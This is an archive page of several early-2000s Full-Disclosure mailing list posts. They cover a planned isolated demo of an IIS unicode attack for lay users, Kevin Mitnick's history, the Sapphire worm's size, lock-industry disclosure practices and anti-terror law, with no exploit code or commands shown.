Thanks to all who offered suggestions. I don't know why I couldn't remember unicode when I was googling, but then I've read thousands of man pages and docs since then, and my mind can only hold so much information. :-)

What I plan to do is load a box with a default install of IIS and use a web browser based attack to demonstrate how easily a box can be compromised when it's unpatched. (I'll probably just deface a web

page.) Since the audience will be normal users, I expect most of them to be astounded and incredulous, which is why I wanted to use something very simple to understand. If I ran a program through a netcat session, I suspect many of them wouldn't get it, but if I type a URL into a browser, I *hope* they will all see that *anyone* could do that, even with very little knowledge of exploits or security practices.

And before you ask, no the box will not be connected to our LAN. Otherwise it would get Code Red and Nimda before I could even complete my demonstration. :-)

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
The University of Texas at Dallas http://www.utdallas.edu/~pauls/ AVIEN Founding Member 
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html







fire-runner.pl
Description: Binary data


Re: [Full-Disclosure] [Secure Network Operations, Inc.] Full Disclosure != Exploit Release

2003-01-29 Thread Kevin Spett
He used his access to TRW and credit information for illegal purposes all
the time.  How do you think he stayed on the run for so long?  He found ways
of faking Western Union money transfers, using TRW data to impersonate
people and a litany of other things.  See Jon Littman's book _The Fugitive
Game_ for the details.

Also, having a large number of stolen creit card numbers did not earn him
the the most wanted cyber-criminal award.  He was primarily in trouble for
intellectual property theft (read: source code).  He became the most wanted
cyber-criminal award because he evaded the police for years while
continuing to commit crimes.  That is what the most wanted lists are about.
People who cannot be caught and continue to break the law (or are likely to
do so).  And who did he set in fear?  He mostly just pissed people off.  Why
would you fear someone for having a large number of stolen creit card
numbers?  This world must be a scary place for you.



Kevin.


 Mitnick ammased a large number of stolen creit card numbers, that was what
 really earned him the most wanted cyber-criminal award in his time.  Even
 though I do not recall a documented case whence he ever used any of those
 numbers in a fraudulent manner.  It was the fear of his potential to
 garner and use them and set people in fear...

 Thanks,

 Ron DuFresne
 ~~
 Cutting the space budget really restores my faith in humanity.  It
 eliminates dreams, goals, and ideals and lets us get straight to the
 business of hate, debauchery, and self-annihilation. -- Johnny Hart
 ***testing, only testing, and damn good at it too!***

 OK, so you're a Ph.D.  Just don't touch anything.

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.netsys.com/full-disclosure-charter.html


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



Re: [Full-Disclosure] Is Sapphire the world's smallest computer worm?

2003-01-25 Thread Kevin Spett
I remember seeing (alledged) Morris worm source code on PacketStorm
awhile ago.


Kevin Spett
SPI Labs
http://www.spidynamics.com/

- Original Message -
From: Roland Postle [EMAIL PROTECTED]
To: Full-Disclosure [EMAIL PROTECTED]
Sent: Saturday, January 25, 2003 3:49 PM
Subject: Re: [Full-Disclosure] Is Sapphire the world's smallest computer
worm?


 On Sat, 25 Jan 2003 14:22:19 -0500, Richard M. Smith wrote:

 At 376 bytes, is this new Sapphire worm the world's smallest computer
 worm?  The only competition I can think of is the Morse worm.  Anybody
 know how big it was?

 I suspect the morse worm was bigger, therefor I'm prepared to offer a
 flashy World's smallest internet worm award (solid gold statuette on
 a marble stand with attached chrome plate which will be etched at a
 later date) to the author of this one. If they would just like to stand
 up and claim it 

 - Blazde

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.netsys.com/full-disclosure-charter.html


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



Re: [Full-Disclosure] Lock business practices security-by-obscurity for 150 years

2003-01-23 Thread Kevin Spett
Yes, but the real question here still remains:

What is Richard smoking and where can I get some of it?



Kevin.
- Original Message -
From: hellNbak [EMAIL PROTECTED]
To: Georgi Guninski [EMAIL PROTECTED]
Cc: Richard M. Smith [EMAIL PROTECTED];
[EMAIL PROTECTED]
Sent: Thursday, January 23, 2003 2:38 PM
Subject: Re: [Full-Disclosure] Lock business practices
security-by-obscurity for 150 years


 On Thu, 23 Jan 2003, Georgi Guninski wrote:


  Richard, you seem to be smoking something bad today.
  If you look at your trollish analogy, from the quote above you will see
that
  such problems are disclosed in locksmith trade journals at least.
  And who cares if micro$osft relies on obscurity?
 

 Georgi, you are letting your immature hatred for Microsoft cloud your
 vision, but what else is new.  Yes, this issue has been known for 150
 years by locksmiths and they didn't understand the security risks or they
 did and didn't care because they didn't think that anyone else would know
 about it.  But, as with most things this wasn't the case.  Others, outside
 of the locksmithing industry no doubt knew about this as well.  With no
 one in the locksmithing industry running out and telling anyone this
 would have made a nice little secret to hang on to.

 So yes, this was security through obscurity.  Without public disclosure
 there would be little motivation for lock companies to retool and create
 better locks.

  --
 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 I don't intend to offend, I offend with my intent

 [EMAIL PROTECTED]
 http://www.nmrc.org/~hellnbak

 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.netsys.com/full-disclosure-charter.html


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



Re: [Full-Disclosure] Australia becomes a police state [serious]

2002-12-06 Thread Kevin Spett
I don't know what the laws in .au are like, but in the US no one can
investigate or challenge an action made that is part of the war on
terrorism.  The information is considered so secret that it can never be
discussed in a court, not even in front of a Supreme Court Justice or the
Senate, not even in front of the Senate intelligence committee.  So in the
US, if they want to harrass people and insist that it's part of the war on
terror, they can.  Due process, even under order of federal courts, has been
*ignored* by the US military and nothing has been done about it.



Kevin.


 Umm.  Not to rain on your Indymedia-inspired parade, Silvio, but have
 you read the legislation, or any of the discussions in parliament
 surrounding it?  Or have you only read the hyperbolic predictions of doom
 that Indymedia agitators have made?  The single key point that seems to
 be missing in Indymedia forums postings as of early this morning when I
 last checked is that these powers are only intended to be invoked in
 the event of a terrorist attack on the State.  Not for random
 harrassment of random ethnic groups, raids on J Random Hacker, or raids
 on political agitators.  Nor will graphing the local courthouse cause
 these laws to be invoked.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



Re: [Full-Disclosure] Hah now this redefines selling out.

2002-10-03 Thread Kevin Finisterre

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Yeah don't get me wrong ... I understand his situation totally. I didn't
see the note at the bottom of the ebay auction that stated it would be
used to pay for legal fees untill after I sent the email.I just can't
imagine paying that much for an old toshiba laptop.  I have a slightly
used Toshiba 400cs that I am willing to sell for $15,000 dollars if
anyone is interested.
=]
- -KF


Phantasm wrote:

|When you are looking to pay off legal fee's for the past as well as the
|legal fee's to get your radio license reinstated, it would sound like a
|good idea.
|
|Not inlcuding Kevin paid about $6,000 in November before the raid and
|the laptop confiscated, need someway to get that laptop paid for.
|
|If you were stuck in the hole trying to pay shit off, you would pawn
|some old shit to pay it as well.
|
|In a week or so, his cell equipment is going up too... Gonna bitch about
|that as well?
|
|Rob
|Textbox Networks
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQE9nP+rMZ9vzENm4VURAmYXAJ0ZpOUab/JMyIQuzgU/yyRr6dc0fwCeLe+G
7afJHh6T4EniAMvJiD/HyL4=
=6Bqg
-END PGP SIGNATURE-


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html